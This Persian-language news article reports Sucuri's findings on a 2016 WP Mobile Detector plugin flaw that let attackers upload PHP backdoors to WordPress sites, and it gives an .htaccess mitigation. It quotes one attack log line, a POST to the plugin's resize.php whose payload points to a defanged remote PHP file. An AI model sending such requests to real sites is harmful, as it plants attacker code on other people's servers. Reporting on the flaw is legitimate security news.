• خرید vpn
  • ما هنـوز به فـردایی روشـن امید داریم

    صفحه اصلی » آخرین خبر , اخبار , اخبار , اینترنت و ای تی » ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند
    کد خبر : 1865845

    ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

    ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتندReviewed by حمید عبدالرحمن on Jun 9Rating: بنابر گزارش کارشناسان شرکت sucuri،  مجرمان سایبری از حفره موجود در آشکارساز موبایل WP (افزونه WP Mobile Detector) به منظور تزریق اسکریپت‌های هرزنامه‌ای که حاوی مطالب نه چندان جالب است، استفاده می‌کنند. بعد از شناسایی و افشای این آسیب‌پذیری،…

    ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتندReviewed by حمید عبدالرحمن on Jun 9Rating:

    ۱۴۶۵۴۱۰۵۲۷

    بنابر گزارش کارشناسان شرکت sucuri،  مجرمان سایبری از حفره موجود در آشکارساز موبایل WP (افزونه WP Mobile Detector) به منظور تزریق اسکریپت‌های هرزنامه‌ای که حاوی مطالب نه چندان جالب است، استفاده می‌کنند. بعد از شناسایی و افشای این آسیب‌پذیری، افزونه فوق از پوشه افزونه‌های وردپرس حذف گردید. در همین ارتباط شرکت sucuri گزارش کرده است: «تیم تحقیقاتی ما به‌طور تخصصی به برررسی این مسئله پرداخت و در نهایت کشف کرد که نقطه مشترک بسیاری از سایت‌های وردپرسی افزونه آشکارساز موبایل WP است. افزونه‌ای که با آپلود یک فایل اختیاری باعث به وجود آمدن آسیب‌پذیری روز صفر در تاریخ ۳۱ می شده است. افزونه فوق از مخزن وردپرس حذف گردیده است اما هیچ وصله‌ای برای آن وجود ندارد.» در حالی که این آسیب‌پذیری در روز ۳۱ ماه می به‌طور عمومی انتشار یافت، اما گزارش‌هایی که توسط دیوارهای آتش به ثبت رسیده است، نشان می‌دهند که این حمله از تاریخ ۲۷ می آغاز شده است. برآوردها نشان می‌‌دهند که این افزونه حداقل بیش از ۱۰ هزار بار نصب شده و بخش عمده‌ای از نصب کنندگان در معرض حملات سایبری مبتنی بر این آسیب‌پذیری قرار دارند.

    آسیب‌پذیری فوق چگونه عمل می‌کند؟

    این نقص ناشی از عدم اعتبارسنجی موفقیت‌آمیز ورودی توسط این افزونه بوده که به هکرها اجازه می‌دهد کدهای مخرب php را به ورودی‌ها ارسال کنند. بهره‌برداری از این آسیب‌پذیری ساده بوده و تنها کاری که هکرها باید انجام دهند، ارسال یک درخواست برای resize.php یا timthumb.php ( بله timthump.php در این حالت تنها شامل resize.php خواهد بود.) همراه با یک آدرس URL که نقش یک درب پشتی را بازی می‌کند، درون پوشه افزونه است. قطعه کدی که در ادامه مشاهده می‌کنید، نمونه‌ای از بارگذاری داده‌ها در یک حمله سایبری را نشان می‌دهد

    ۱۸۸.۷۳.۱۵۲.۱۶۶ – – [۳۱/May/2016:23:54:43 -0400] “POST /wp-content/plugins/wp-mobile-detector/resize.php

    Payload:src=hxxp://copia[.]ru/mig/tmp/css.php”

    Sucuri گفته است: «با توجه به این‌که هیچ‌گونه وصله‌ای برای این آسیب‌پذیری عرضه نشده است، در نتیجه کار عاقلانه‌ای است کاربران افزونه آشکارساز موبایلی wp را غیر فعال سازند. اما اگر واقعا به این افزونه نیاز دارید بهتر است یک وصله موقتی برای غیر فعال کردن اجرای php در زیرپوشه wp-mobile-detector/cache را مورد استفاده قرار دهید. به طور مثال، از قطعه کد زیر در فایل .htaccess file. استفاده کنید.

    <Files *.php>

    deny from all

    </Files>

    مدیران سایت‌های وردپرسی آلوده می‌توانند درخواست خود را برای بخش پشتیبانی شرکت Sucuri ارسال کنند.

    دوره های نوروزی عصر شبکه

    مطالب مرتبط

    ویژه های ایران ویج

    دیدگاهها (۰)



    ;کانال تلگرام ایران ویج اصلاحات نیوز آموزشگاه مهندسی عصر شبکه

    آخرین اخبار و مطالب

    پربحث ترین های هفته

    Sorry. No data so far.